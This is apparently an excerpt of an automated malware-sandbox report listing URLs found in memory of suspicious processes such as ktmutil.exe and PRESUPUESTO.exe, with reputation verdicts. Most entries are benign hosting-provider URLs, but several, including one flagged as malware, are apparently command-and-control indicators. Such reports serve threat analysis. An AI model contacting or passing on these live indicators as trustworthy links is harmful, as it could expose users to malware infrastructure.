                                              https://gui.active24.cz/img/icon/a24-apple-favicon-57x57.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-favicon-32x32.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://faq.active24.com/cz/806087-Z%c3%a1kladn%c3%ad-informacektmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/webforward-mailforwardktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://mssql.active24.com/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/domeny#m-certifikacektmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/default-domain/free.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://active24.com/cssc/a21/main.less?v=7d8e320747f67055c1a1008fbc40d0c1ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-152x152.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/domenyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.comktmutil.exe, 00000009.00000002.4589157081.0000000004032000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004012000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://gq64q4.cn/user/design/clas/euse/sksueqquqf/81ktmutil.exe, 00000009.00000002.4589157081.0000000003EA0000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000003E80000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/o-spolecnosti/obchodni-podminkyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/library/theme/hp16/style.cssktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://customer.active24.com/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-114x114.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-180x180.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://active24.cz/objednavka/domain/availability/listktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/font/active24-icons.eotktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/o-spolecnosti/mediaktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://faq.active24.com/cz/045021-Webov%c3%a9-str%c3%a1nky-a-E-shopyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://faq.active24.com/cz/085122-Hosting-a-Serveryktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/font/active24-icons.woffktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/o-spolecnosti/kontaktyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/weby/mojestrankyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-favicon-96x96.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-76x76.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.transelva.com/edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000003CEE000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/jak-na-tvorbu-webuktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerPRESUPUESTO.exe, 00000000.00000002.2154526498.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.genesiestudios.onlineMqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4590404042.00000000055B8000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.active24.com/o-spolecnosti/rikaji-o-nas-zakazniciktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-60x60.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/o-spolecnosti/karieraktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/default-domain/dnssec.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://faq.active24.com/cz/808905-E-mailov%c3%a1-%c5%99e%c5%a1en%c3%adktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-120x120.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/font/active24-icons.svgktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/webmail_ikony_vlajky.png)MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/o-spolecnostiktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-ms-icon-144x144.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://faq.active24.com/cz/932337-Spolupr%c3%a1cektmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://faq.active24.com/cz/939671-Fakturace-a-platbyktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/dnssecktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/font/active24-icons.ttfktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/klientska-zona/zakaznicka-podporaktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://faq.active24.com/cz/757409-Bezpe%c4%8dnostktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/default-domain/dns.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://blog.active24.cz//ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://ww7.europedriveguide.com/2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzhktmutil.exe, 00000009.00000002.4589157081.000000000467A000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.000000000465A000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.ecosia.org/newtab/ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://gui.active24.cz/img/default-domain/superpage.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.chiark.greenend.org.uk/~sgtatham/putty/0rPRESUPUESTO.exefalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://faq.active24.com/cz/920729-Dom%c3%a9ny-a-DNSktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.com/objednavka/loginktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://webmail.active24.com/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://gui.active24.cz/img/default-domain/image.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://mysql.active24.com/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/css/landing.cssktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-144x144.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/default-domain/redirect.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/default-domain/notify.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-favicon-192x192.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://gui.active24.cz/img/icon/a24-apple-favicon-72x72.pngktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.active24.comMqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.superstranka.cz/ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.active24.com/spolupracektmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
